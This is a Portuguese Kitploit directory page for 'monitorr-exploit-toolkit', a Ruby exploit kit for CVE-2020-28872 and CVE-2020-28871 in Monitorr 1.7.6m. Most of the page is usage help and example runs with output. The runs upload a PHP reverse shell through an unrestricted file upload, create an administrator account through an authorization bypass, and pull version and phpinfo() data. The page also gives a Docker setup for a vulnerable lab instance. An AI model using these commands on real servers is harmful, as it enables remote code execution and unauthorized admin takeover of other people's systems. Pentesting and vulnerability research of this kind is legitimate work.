Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
monitorr-exploit-toolkit — Múltiplos exploits para Monitorr | Kitploit
Ferramentas/GitHubGitHub/sec-it/monitorr-exploit-toolkit
Autenticação e AutorizaçãoAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de Penetração
GitHubsec-it/monitorr-exploit-toolkit

monitorr-exploit-toolkit

Múltiplos exploits para Monitorr

Ver Repositório
1014há 5 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Kit de exploits Monitorr

  • RCE via upload de arquivo inseguro (PHP reverse shell, webshell, etc.)
  • Criação de conta de administrador via bypass de autorização
  • Vazamento de informações técnicas: versão do Monitorr, versão do PHP, versão do sistema e kernel, configuração do PHP, etc.

Exploit para CVE-2020-28872 e CVE-2020-28871.

[PacketStorm]

Uso

root@kitploit:~
$ ruby exploit.rb -h
Monitorr-Exploit

Usage:
  exploit.rb upload <url> <file> [--debug]
  exploit.rb create <url> <user> <pass> <email> [--debug]
  exploit.rb version <url> [--debug]
  exploit.rb phpinfo <url> [--debug]
  exploit.rb -h | --help

upload:       Upload a file (RCE via unrestricted file upload)
version:      Try to fetch Monitorr version
phpinfo:      Extract main phpinfo() information (Information leakage)
create:       Create an administrator account (Authorization bypass)

Options:
  <url>       Root URL (base path) including HTTP scheme, port and root folder
  <file>      File to be uploaded
  --debug     Display arguments
  -h, --help  Show this screen

Examples:
  exploit.rb upload http://example.org revshell.php
  exploit.rb create https://example.org:8080/monitorr/ noraj password '[email protected]'
  exploit.rb version https://example.org:7000/

Exemplos

Fazer upload de uma shell reversa:

root@kitploit:~
$ ruby exploit.rb upload http://localhost:7000/ shell.php
[+] File uploaded:
http://localhost:7000//assets/data/usrimg/shell.php

Criação de conta de administrador:

root@kitploit:~
$ ruby exploit.rb create http://localhost:7000/ noraj20 password '[email protected]'
[+] User created
Username: noraj20
Email: [email protected]
Password: password

Obter a versão do Monitorr:

root@kitploit:~
$ ruby exploit.rb version http://localhost:7000/
1.7.6m

Obter phpinfp():

root@kitploit:~
$ ruby exploit.rb phpinfo http://localhost:7000/
System: Linux f0ded2053dda 5.12.12-zen1-1-zen #1 ZEN SMP PREEMPT Fri, 18 Jun 2021 21:59:24 +0000 x86_64 
PHP version: 7.1.17 
disable_functions: no value</i>
open_basedir: no value</i>

Full phpinfo() location: http://localhost:7000//assets/php/phpinfo.php

Requisitos

  • httpx
  • docopt.rb

Exemplo usando gem:

root@kitploit:~
bundle install
# or
gem install httpx docopt

Implantação Docker do software vulnerável

Aviso: obviamente, esta configuração não é adequada para uso em produção!

root@kitploit:~
$ sudo docker-compose up

Configure / inicialize o aplicativo em http://127.0.0.1:7000/monitorr/settings.php.

Limitações

  • Upload: o arquivo enviado deve ter um byte mágico de imagem (ex.: GIF) para corresponder ao getimagesize (código)
  • Create: a senha usada durante a criação de senha deve ter pelo menos 6 caracteres (limite mínimo do aplicativo)

Referências

  • Software alvo: Monitorr
    • Código-fonte: https://github.com/Monitorr/Monitorr/
    • Docker: https://hub.docker.com/r/monitorr/monitorr/
    • Versão vulnerável: 1.7.6m

Esta é uma melhor reescrita e fusão de EDB-48981 (CVE-2020-28872) e EDB-48980 (CVE-2020-28871) com funcionalidades extras.

As vulnerabilidades de upload e criação de conta de administrador foram encontradas por Lyhin's Lab. O vazamento do phpinfo e da versão do Monitorr foi encontrado por Alexandre ZANNI aka noraj.

Análise do exploit e da vulnerabilidade originais:

  • Como funciona o hacking de caixa branca: bypass de autorização e execução remota de código no Monitorr 1.7.6
Baixar ferramenta